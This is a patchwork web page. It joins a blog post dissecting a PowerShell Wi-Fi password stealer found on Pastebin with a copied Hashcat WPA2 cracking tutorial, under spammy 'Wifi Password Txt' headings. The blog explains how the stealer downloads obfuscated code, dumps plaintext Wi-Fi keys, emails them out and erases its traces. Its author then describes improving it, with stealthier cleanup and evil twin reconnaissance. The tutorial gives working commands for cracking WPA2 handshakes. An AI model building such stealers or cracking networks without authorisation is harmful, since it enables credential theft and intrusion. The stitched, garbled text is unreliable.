Yesterday afternoon I discovered that Pastebin has what they call the Pastes Archive that is just a listing of the last 20 or so things people have uploaded and given the popularity of the site this means you can kind of just sit here and refresh every minute and get something new. I was honestly surprised by the amount of text based porn ads someone had set up a bot to post along with fan fiction writing, someones bash file for installing build-essentials twice (???), and a wide variety of scripts, functions, and lots of hello worlds. It was a fun time killer and I figured maybe if I revisit this from time to time I would actually get something useful out of it and I wouldn’t get sucked into it for over an hour like I do on /r/CatsWhoYell.

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. SecLists/10-million-password-list-top-1000000.txt at master danielmiessler. W PasswordList.txt is the name of my word list document, which contains large number of passwords; Key Found using Aircrack-ng. Aircrack-ng tool runs through the word list document, match each word in the word list with the handshake packet one by one. And at the end, we are able to find the key “abc12345” which is our WiFi network key. I solved the issue. We can import any WIFI and SSID that is setted to file /boot/wifikeyfile.txt. An example forwifikeyfile.txt is. Ssid='WIFI BASE SSID' psk='Secret Key'.

What’s on Pastebin this morning?

This morning when I woke up I still had the page open so I refreshed to see what would pop up.

And apparently I’m a lucky man because 19 seconds prior to me refreshing someone posted a file conspicuously named wifi.PS1

This is for educational purposes DO NOT do this to a machine you do not have permission on!

Now then a PS1 file typically signifies it’s going to be run in PowerShell and if someone is posting a PowerShell file named “wifi” it can really mean only a few things.

1. Someone got tired of configuring the Wi-Fi on all the PC’s in a building and wrote a script to do it so they could quickly apply it
2. Someone wrote a script for doing the typical trouble shooting steps for Wi-Fi for them
3. Someone needs the MAC address so that they can whitelist the machine on the network
4. Someone needs to extract the Wi-Fi information from a machine

Well we got #4 but if someone has #2 please email me because I could use a script for that on my relatives machines.

As a quick aside from someone who mostly uses bash based terminals in Linux, PowerShell has a lot of the same command names unlike CMD which is part of why Microsoft would prefer it if we all forgot about CMD.

Let’s walk through this script:

1. It’s changing directory to root (C drive for example) then making a directory called x64 and entering it
2. Uses wget to download another pastebin file (raw gives you the raw text) and it’s storing it as wifi.bat
3. Now it runs the wifi.bat file
4. Remove-ItemProperty is a command for clearning a Windows Registry entry, in this script they are clearing RunMRU which stands for “Run Most Recently Used” and is the history keeper for commands ran via start. They are also telling it to do it based on Name with a wildcard (*) and if any error is encountered it should supress the error and move on

As an example here is my RunMRU

This is the part where things get interesting, that raw Pastebin is actually being obfuscated!

I know this is not a one way hash and it has to be something PowerShell can actually interpret without doing any complex decoding. It’s clearly not hex which leaves us with the next most common candidate, base64.

So I open up good ol CyberChef and throw the blob into the input and drag over “From Base64” and ta da we get our batch file!

So let’s walk through this:

1. netsh wlan export profile key=clear is a really cool command that dumps your Wi-Fi information, including plaintext password, to an XML file inside of whatever directory you are in.
2. This is printing a message into a file called wifipass.txt (more on who Exploitech is later)
3. These next four lines are parsing every .xml file in the folder and appending it to the wifipass.txt file
4. This next section is for sending wifipass.txt file to themselves. It’s pretty straightforward, they establish that they wish to connect to the gmail SMTP server and provide the login credentials and attach the wifipass.txt then send the email. I’ve changed out their credentials with some fake ones.
5. Remove the XML files along with two files called w.txt and w.PS1 then wipe the RunMRU

However, this does not work!

The issue is that they are saving and executing wifi.bat as a batch file, however

will only work in Powershell.

I made a defanged version of the script that removes the emailing portion and cleanup to demonstrate.

As you can see wifipass.txt is empty except for that initial echo header text.If we run the batch file on it’s own we see the following

However this can be easily corrected to run properly by renaming it to wifiExtract.PS1 and modifying our execution script

Now that I had this I started wondering:

1. Who is Exploitech
2. Why is someone using a broken payload

A quick Google search made it clear pretty quick

Watching the video it’s easy to see that originally Exploitech had meant for the obfuscated code to be executed as such

The person who made the one I found had simply been incapable of actually following directions or had decided they wanted to modify it in their own way but they didn’t really know what they were doing.

Making it Better

So this set of scripts is pretty cool but I think I could make them better.

I made a fork which you can find here on GitHub.

Explorer.PS1

SystemDriver.PS1

Example Output

So what did I change?

For starters they’re using rm which doesn’t fully delete the file, it is only sending it to the Windows Recycle Bin. Instead of using rm I used Remove-Item, this will delete an item and bypass the Recycle Bin. So now the script fully cleans up after itself.

Next I did not like the odd use of a batch file. Watching the video they for some reason decided to post the Base64 blob + the lines to decode into the same Pastebin post, which meant there was nothing really being obfuscated as anyone who downloaded and ran the paste as a batch file would get the nonobfuscated version… So now it is configured such that you just host the raw base64 blob somewhere like Pastebin and it will download that and save it as a text file which it will then convert to it’s UTF8 form and write back into a PowerShell file followed by executing it.

Inside the SystemDriver.PS1 I had it grab two extra lines of information from the profile export, the authentication and encryption methods. That way you can make sure you configure your settings before attempting to connect to any Wi-Fi point or if you want to try and do an evil twin attack. Which leads to my next feature for the output which was adding the driver information for wlan so you could see what hardware the computer has if you wanted to use it as a Wi-Fi hotspot for either yourself or as an evil twin access point.

Finally I updated the formating on the SMTP section simply because it looked messy and I didn’t like entering the same info multiple times.

I have some ideas on how to maybe further flesh this out but it might actually be best to turn it into a set of network pentesting related scripts instead of just Wi-Fi.

Hopefully if you made it this far you enjoyed the post and learned something like I did, if you’re curious about why it is Wi-Fi passwords are stored like this I asked on the security StackExchange and got back some great answers!

Until next time,

Jesse “Wazanator” Culver

For the most part, aircrack-ng is ubiquitous for wifi and network hacking. But in this article, we will dive in in another tool – Hashcat, is the self-proclaimed world’s fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software and also open source. Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants.

What is different between aircrack-ng and hashcat?

Basically, Hashcat is a technique that uses the graphics card to brute force a password hash instead of using your CPU, it is fast and extremely flexible- to writer made it in such a way that allows distributed cracking. aircrack-ng can only work with a dictionary, which severely limits its functionality, while oclHashcat also has a rule-based engine.

Before we go through I just want to mention that you in some cases you need to use a wordlist, which is a text file containing a collection of words for use in a dictionary attack. And, also you need to install or update your GPU driver on your machine before move on.

Setup environment

Suppose this process is being proceeded in Windows. First, to perform a GPU based brute force on a windows machine you’ll need:

Then:

• You need to go to the home page of Hashcat to download it at: https://hashcat.net/hashcat/
• Then, navigate the location where you downloaded it. Then unzip it, on Windows or Linux machine you can use 7Zip, for OS X you should use Unarchiever.
• Open up your Command Prompt/Terminal and navigate your location to the folder that you unzipped. If you haven’t familiar with command prompt yet, check out this article.
• Run the executable file by typing hashcat32.exe or hashcat64.exe which depends on whether your computer is 32 or 64 bit (type make if you are using macOS).

WPA2 dictionary attack using Hashcat

Open cmd and direct it to Hashcat directory, copy .hccapx file and wordlists and simply type in cmd

Here I have NVidia’s graphics card so I use CudaHashcat command followed by 64, as I am using Windows 10 64-bit version. yours will depend on graphics card you are using and Windows version(32/64).

cudaHashcat64.exe – The program, In the same folder theres a cudaHashcat32.exe for 32 bit OS and cudaHashcat32.bin / cudaHashcat64.bin for Linux. oclHashcat*.exe for AMD graphics card.

-m 2500 = The specific hashtype. 2500 means WPA/WPA2.

Wifi Password Txt File

In case you forget the WPA2 code for Hashcat.

Windows CMD: cudaHashcat64.exe –help | find “WPA”

Linux Terminal: cudaHashcat64.bin –help | grep “WPA”

It will show you the line containing “WPA” and corresponding code.

Handshake-01.hccap = The converted *.cap file.

wordlist.txt wordlist2.txt= The wordlists, you can add as many wordlists as you want. To simplify it a bit, every wordlist you make should be saved in the CudaHashcat folder.

After executing the command you should see a similar output:

Wait for Hashcat to finish the task. You can pass multiple wordlists at once so that Hashcat will keep on testing next wordlist until the password is matched.

WPA2 Mask attack using Hashcat

As told earlier, Mask attack is a replacement of the traditional Brute-force attack in Hashcat for better and faster results.

let’s have a look at what Mask attack really is.

In Terminal/cmd type:

• cudaHashcat64.exe -m 2500 <rootsh3ll-01.hccapx> -a 3 ?d?l?u?d?d?d?u?d?s?a

-a 3 is the Attack mode, custom-character set (Mask attack)

?d?l?u?d?d?d?u?d?s?a is the character-set we passed to Hashcat. Let’s understand it in a bit of detail that

• What is a character set in Hashcat ?
• Why it is useful ?

What is a character set in Hashcat ?

?d ?l ?u ?d ?d ?d ?u ?d ?s ?a = 10 letters and digits long WPA key. Can be 8-63 char long.

The above text string is called the “Mask”. Every pair we used in the above examples will translate into the corresponding character that can be an Alphabet/Digit/Special character.

For remembering, just see the character used to describe the charset

?d: For digits

?s: For Special characters

?u: For Uppercase alphabets

?l: For Lowercase alphabets

?a: all of the above.

Simple! isn’t it ?

Here is the actual character set which tells exactly about what characters are included in the list:

Here are a few examples of how the PSK would look like when passed a specific Mask.

PSK = ?d?l?u?d?d?d?u?d?s?a

0aC575G2/@
9zG432H0*K
8sA111W1$4
3wD001Q5+z

So now you should have a good understanding of the mask attack, right ?

Let’s dig a bit deeper now.

Mixing Mask attack with Custom characters.

Let’s say, we somehow came to know a part of the password. So, it would be better if we put that part in the attack and randomize the remaining part in Hashcat, isn’t it ?

Sure! it is very simple. Just put the desired characters in the place and rest with the Mask.

Here?d ?l 123 ?d ?d ?u ?d C is the custom Mask attack we have used. Here assuming that I know the first 2 characters of the original password then setting the 2nd and third character as digit and lowercase letter followed by “123” and then “?d ?d ?u ?d” and finally ending with “C” as I knew already.

What we have actually done is that we have simply placed the characters in the exact position we knew and Masked the unknown characters, hence leaving it on to Hashcat to test further.

Here is one more example for the same:

Let’s say password is “Hi123World” and I just know the “Hi123” part of the password, and remaining are lowercase letters. Assuming length of password to be 10.

So I would simply use the command below

Where ?u will be replaced by uppercase letters, one by one till the password is matched or the possibilities are exhausted.

Moving on even further with Mask attack i.r the Hybrid attack.

In hybrid attack what we actually do is we don’t pass any specific string to hashcat manually, but automate it by passing a wordlist to Hashcat.

Hashcat picks up words one by one and test them to the every password possible by the Mask defined.

Example:

• cudaHashcat64.exe -m 2500 handshake.hccapx -a 1 password.txt ?d?l?d?l

-a 1 : The hybrid attack
password.txt : wordlist
?d?l?d?l = Mask (4 letters and numbers)

The wordlist contains 4 words.

Now it will use the words and combine it with the defined Mask and output should be this:

carlos2e1c
bigfoot0h1d
guest5p4a
onion1h1h

It is cool that you can even reverse the order of the mask, means you can simply put the mask before the text file. Hashcat will bruteforce the passwords like this:

7a2ecarlos
8j3abigfoot
0t3wguest
6a5jonion

You getting the idea now, right ?

Using so many dictionary at one, using long Masks or Hybrid+Masks takes a long time for the task to complete. It is not possible for everyone every time to keep the system on and not use for personal work and the Hashcat developers understands this problem very well. So, they came up with a brilliant solution which no other password recovery tool offers built-in at this moment. That is the Pause/Resume feature

WPA2 Cracking Pause/resume in Hashcat (One of the best features)

This feature can be used anywhere in Hashcat. It isn’t just limited to WPA2 cracking. Even if you are cracking md5, SHA1, OSX, wordpress hashes. As soon as the process is in running state you can pause/resume the process at any moment.

Just press [p] to pause the execution and continue your work.

To resume press [r]. All the commands are just at the end of the output while task execution. See image below

You might sometimes feel this feature as a limitation as you still have to keep the system awake, so that the process doesn’t gets cleared away from the memory.

And we have a solution for that too. Create session!

WPA2 Cracking save Sessions and Restore.

Creating and restoring sessions with hashcat is Extremely Easy.

Just add –session at the end of the command you want to run followed by the session name.

Example:

Wifi Password Txt Online

Here I named the session “blabla”. You can see in the image below that Hashcat has saved the session with the same name i.e blabla and running.

Now you can simply press [q] close cmd, ShutDown System, comeback after a holiday and turn on the system and resume the session. That easy!

NOTE: Once execution is completed session will be deleted.

How to restore ?

Above command – “–restore”. Here it goes:

Hashcat will now check in its working directory for any session previously created and simply resume the Cracking process.

Simple enough ? Yes it is.

This is all for Hashcat. Hope you understand it well and performed it along. No need to be sad if you don’t have enough money to purchase those expensive Graphics cards for this purpose you can still try cracking the passwords at high speeds using the clouds. You just have to pay accordingly.

Kali Linux Wifi Password Txt File

To specify device use the -d argument and the number of your GPU.
The command should look like this in end:

Example:

Where Handshake.hccapx is my handshake file, and eithdigit.txt is my wordlist, you need to convert cap file to hccapx using https://hashcat.net/cap2hccapx/

Wifi Password.txt Free Download

This article is referred from rootsh3ll.com.